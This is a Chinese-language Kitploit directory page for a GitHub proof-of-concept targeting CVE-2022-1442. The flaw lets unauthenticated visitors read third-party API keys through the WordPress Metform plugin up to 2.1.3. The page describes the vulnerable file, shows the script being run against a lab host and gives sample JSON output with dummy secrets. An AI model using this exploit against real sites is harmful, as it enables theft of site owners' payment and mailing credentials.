Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-1442 — WordPress插件Metform <= 2.1.3 - 权限控制不当导致未授权敏感信息泄露 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2022-1442
漏洞分析漏洞利用信息收集Web安全渗透测试错误配置
GitHubrandomrobbiebf/cve-2022-1442

CVE-2022-1442

WordPress插件Metform <= 2.1.3 - 权限控制不当导致未授权敏感信息泄露

查看仓库
23年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-1442

WordPress 插件 Metform <= 2.1.3 - 不恰当的访问控制导致未认证的敏感信息泄露

描述

由于 ~/core/forms/action.php 文件中存在不恰当的访问控制,该插件容易受到敏感信息泄露攻击,未认证的攻击者可以利用该漏洞查看所有集成的第三方 API 的密钥和机密信息,例如 PayPal、Stripe、Mailchimp、Hubspot、HelpScout、reCAPTCHA 等。

POC

root@kitploit:~
 bash metform.sh http://wordpress.lan
{
  "form_title": "New Form # 1691056894",
  "success_message": "Thank you! Form submitted successfully.",
  "capture_user_browser_data": "1",
  "store_entries": "1",
  "entry_title": "Entry # [mf_id]",
  "count_views": "1",
  "redirect_to": "",
  "user_email_subject": "",
  "user_email_from": "",
  "user_email_reply_to": "",
  "user_email_body": "",
  "admin_email_subject": "",
  "admin_email_to": "",
  "admin_email_from": "",
  "admin_email_reply_to": "",
  "admin_email_body": "",
  "mf_mailchimp_list_id": "",
  "mf_slack_webhook": "",
  "mf_recaptcha_version": "recaptcha-v2",
  "mf_recaptcha_site_key": "sfsdffd",
  "mf_recaptcha_secret_key": "sfddsf",
  "mf_recaptcha_site_key_v3": "",
  "mf_recaptcha_secret_key_v3": "",
  "mf_mailchimp_api_key": "asdadasdsaddas",
  "input_names": "Example: [mf-inputname]",
  "ckit_opt": [],
  "aweber_opt": [],
  "mp_opt": []
}
下载工具